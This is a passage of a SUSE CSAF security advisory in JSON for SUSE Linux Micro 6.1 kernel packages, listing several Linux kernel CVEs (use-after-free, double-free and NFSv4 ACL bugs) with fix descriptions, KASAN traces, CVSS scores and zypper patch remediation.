ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
